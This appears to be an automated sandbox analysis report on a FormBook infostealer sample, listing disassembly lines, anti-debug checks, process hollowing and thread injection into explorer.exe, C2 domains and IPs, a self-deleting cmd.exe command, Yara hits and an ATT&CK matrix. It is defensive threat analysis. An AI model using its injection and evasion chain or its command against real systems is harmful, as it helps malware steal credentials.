          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]12_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]12_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03882073 mov eax, dword ptr fs:[00000030h]12_2_03882073
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9080 mov eax, dword ptr fs:[00000030h]12_2_037C9080
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03891074 mov eax, dword ptr fs:[00000030h]12_2_03891074
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847794 mov eax, dword ptr fs:[00000030h]12_2_03847794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847794 mov eax, dword ptr fs:[00000030h]12_2_03847794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847794 mov eax, dword ptr fs:[00000030h]12_2_03847794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DFF60 mov eax, dword ptr fs:[00000030h]12_2_037DFF60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DEF40 mov eax, dword ptr fs:[00000030h]12_2_037DEF40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FE730 mov eax, dword ptr fs:[00000030h]12_2_037FE730
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C4F2E mov eax, dword ptr fs:[00000030h]12_2_037C4F2E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C4F2E mov eax, dword ptr fs:[00000030h]12_2_037C4F2E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EF716 mov eax, dword ptr fs:[00000030h]12_2_037EF716
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA70E mov eax, dword ptr fs:[00000030h]12_2_037FA70E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA70E mov eax, dword ptr fs:[00000030h]12_2_037FA70E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038037F5 mov eax, dword ptr fs:[00000030h]12_2_038037F5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0389070D mov eax, dword ptr fs:[00000030h]12_2_0389070D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0389070D mov eax, dword ptr fs:[00000030h]12_2_0389070D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385FF10 mov eax, dword ptr fs:[00000030h]12_2_0385FF10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385FF10 mov eax, dword ptr fs:[00000030h]12_2_0385FF10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03898F6A mov eax, dword ptr fs:[00000030h]12_2_03898F6A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D8794 mov eax, dword ptr fs:[00000030h]12_2_037D8794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385FE87 mov eax, dword ptr fs:[00000030h]12_2_0385FE87
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]12_2_037EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]12_2_037EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]12_2_037EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]12_2_037EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]12_2_037EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D766D mov eax, dword ptr fs:[00000030h]12_2_037D766D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038446A7 mov eax, dword ptr fs:[00000030h]12_2_038446A7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03890EA5 mov eax, dword ptr fs:[00000030h]12_2_03890EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03890EA5 mov eax, dword ptr fs:[00000030h]12_2_03890EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03890EA5 mov eax, dword ptr fs:[00000030h]12_2_03890EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]12_2_037D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]12_2_037D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]12_2_037D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]12_2_037D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]12_2_037D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]12_2_037D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03808EC7 mov eax, dword ptr fs:[00000030h]12_2_03808EC7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387FEC0 mov eax, dword ptr fs:[00000030h]12_2_0387FEC0
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037CE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_03898ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037FA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037FA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037CC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037CC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037CC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_03881608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_0387FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_0388AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_0388AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037EC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037EC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_038905AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_038905AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037E7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037CAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_03846DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_0388FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_0388FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_0388FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_0388FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_03878DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037DD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037DD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_0388E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_0384A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_03898D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_03803D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_03843540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037FFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037FFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037F2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037E746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe; Code function: 12_2_037FA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Code function: 2_2_00409B40 LdrLoadDll
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Network Connect: 142.252.22.166 80
Source: C:\Windows\explorer.exe; Network Connect: 154.94.210.101 80
Source: C:\Windows\explorer.exe; Domain query: www.dragonmodz.net
Source: C:\Windows\explorer.exe; Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe; Domain query: www.blueprintroslyn.com
Source: C:\Windows\explorer.exe; Domain query: www.qzttb.net
Source: C:\Windows\explorer.exe; Domain query: www.royaldears.com
Source: C:\Windows\explorer.exe; Domain query: www.pittsburghdata.center
Source: C:\Windows\explorer.exe; Network Connect: 209.17.116.163 80
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 9E0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Thread register set: target process: 3440
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\netsh.exe; Thread register set: target process: 3440
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
Source: C:\Windows\SysWOW64\netsh.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
Source: explorer.exe, 00000005.00000000.362125482.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.367609334.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.404234223.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.381883157.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.396756364.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.358182276.00000000008B8000.00000004.00000020.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmp; Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmp; Binary or memory string: &Program Manager
Source: explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Queries volume information: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe VolumeInformation
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match; File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match; File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Command and Scripting Interpreter2 | Path Interception | Process Injection512 | Masquerading1 | OS Credential Dumping | Security Software Discovery221 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools11 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection512 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | System Information Discovery112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue

(The trailing digits on a technique name are the report's signature-hit counters for that technique.)

Behavior Graph

Behavior Graph ID: 528618; Sample: cK1g5gckZR9VHjj.exe; Start date: 25/11/2021; Architecture: WINDOWS; Score: 100

Process tree and per-node annotations recovered from the graph:

Start node
  DNS/IP: www.pittsburghdata.center
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures
  -> cK1g5gckZR9VHjj.exe (started)
       Signature: Tries to detect virtualization through RDTSC time measurements
       -> cK1g5gckZR9VHjj.exe (started)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            -> explorer.exe (injected)
                 DNS/IP: www.qzttb.net 154.94.210.101, 49779, 80 ROOTNETWORKSUS Seychelles; www.dragonmodz.net 142.252.22.166, 49821, 80 EGIHOSTINGUS United States; 3 other IPs or domains
                 Signatures: System process connects to network (likely due to code injection or exploit); Uses netsh to modify the Windows network and firewall settings
                 -> netsh.exe (started)
                      Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                      -> cmd.exe (started)
                           -> conhost.exe (started)
       -> cK1g5gckZR9VHjj.exe (started)


